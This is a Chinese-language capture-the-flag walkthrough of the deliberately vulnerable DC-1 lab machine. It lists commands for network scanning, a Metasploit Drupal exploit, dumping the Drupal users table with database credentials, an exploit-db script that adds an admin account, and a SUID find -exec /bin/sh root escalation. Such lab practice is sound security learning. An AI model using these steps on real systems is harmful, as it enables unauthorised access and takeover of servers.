存活主机扫描
arp-scan -l
这里看到DC-1的IP地址为192.168.168.164
端口扫描
nmap -p- 192.168.168.164
这里可以发现开放了ssh、http这两个服务,其他两个并没有很大作用,所以利用这两个开放的端口作为突破点进行渗透
渗透攻击
ssh服务需要登录账号密码,可以先利用http服务看看能不能找到有用的信息
192.168.168.164:80
可以看到这个页面是属于Drupal的,在GitHub上面搜索了一下。是一个开源的网站
msfconsole攻击
利用msf搜索下里面有没有什么相关的漏洞攻击
msfconsole
search drupal
测试了下发现第二个是可以利用的,查看下要设置什么参数
use 1
show options
只要再设置一个攻击目标就可以了,直接进行漏洞利用
set rhost 192.168.168.164
直接看看主机里面有哪些文件、信息之类的
ls
可以看到一个非常有用的flag1.txt
cat flag1.txt
这里给了我们一个提示,每个好的CMS需要一个配置文件,也就是说下个flag藏在一个配置文件中,这里可以再看到我们之前的列出来的文件中有没有关于config的,最直接的就是web.config
cat web.config
在这个文件中也没有找到下一个flag,所以只能再在其他的文件中慢慢寻找,最后经过不懈的努力在这个site文件夹的default文件夹下找到了settings.php文件,在这个文件中存在第二个flag
这里的flag翻译是暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。您可以使用这些凭据做什么?根据这个flag提示应该是想让我们进行提权操作,进行root提权或者是登录进drupal的界面,这里我们先尝试使用下python里面的交互shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
连接数据库
mysql -udbuser -pR0ck3t
查看数据库
show databases
;
可以看到这里面有两个数据库,我们主要查看的是第二个drupaldb的数据库,它应该就是drupal浏览器的数据库了
use drupaldb
show tables
;
在这里我们可以一个让我们非常兴奋的词users,哈哈哈哈哈,终于又找到了有用的信息,紧接着我们用sql语句进行查询就可以,果然在里面发现了admin之类的登录账户和密码,不过密码是密文的
select * from users
在这个地方可以选择去破解密文或者是添加一个账户,这里我还是用添加一个账户的方法
searchsploit
searchsploit drupal
靶子机的drupal是7.0版本的,我们就使用7.0的利用工具创建一个账户和密码
python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.168.164 -u admin3 -p admin3
可以看见这里已经提示我们账户和密码已经创建好了,我们可以到users表中再进行查看,发现我们创建的admin3已经到表中去了
登录drupal
在登录界面输入账户admin3,密码admin3,进入到home界面
在上面这一栏中有很多选项content、structure之类的,我们每个都尝试进入看能不能找到有用的信息,也确实是在content的界面中发现了我们要找的flag3(我找你找的好苦啊~~)
简简单单的单击一下这个flag3
在这里我们又得到了一个关键的提示:特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令以弄清楚如何获取阴影中的内容。这是什么意思呢?这两个PERMS和passwd猜测应该两个文件之类的,所以回到上面查看到的文件
确实好像没什么相关的,那就又一个一个的去找,最后在这个/etc的文件下找到了一个passwd的文件,查看这个文件就得到了flag4的提示
cat passwd
这个提示显示flag4在home的文件夹下,所以我们再进入home文件夹下查看flag4
可以看到home文件夹下确实有一个flag4的文件,查看下它
这里发现它并不是一个文件,而是一个文件夹,哈哈哈哈哈,看到flag就被冲昏了头脑,我们在进入一层文件夹下
这里给我们的提示是:您可以使用相同的方法在root中查找或访问徽标吗?可能。但也许这并不容易。 或者也许是?简单来说就是要我们在root权限下找到这个flag
root提权
使用find命令查找suid的命令
find / -perm -4000
使用find命令进行提权
find /var/www/misc -exec “/bin/sh” ;
可以看到我们已经是root权限了,之后就是一直cd … 退到最开始的目录下,然后列出所有的文件夹,找到root文件夹,然后进入到root文件夹下查看文件就得到了我们最后一个flag啦
最后的激动人心的时刻就是查看我们的flag了
好吧,这个flag好像没我之前找到的那些好看
小结
最基础的就是使用arp-scan、nmap扫描工具,然后这里用到了我之前都没使用到的MySQL的操作,虽然比较基础的,show databases、use databases、select * from tables之类的命令,也是一个小小的进步吧,之前在学校里面学习过一些mysql的基本语法选择语句,这里与渗透攻击相结合使用了,还有就是提权的操作也是我之前没有用到的。大概就是这么多了,勉励一下自己吧,还需努力,哈哈哈哈哈哈哈…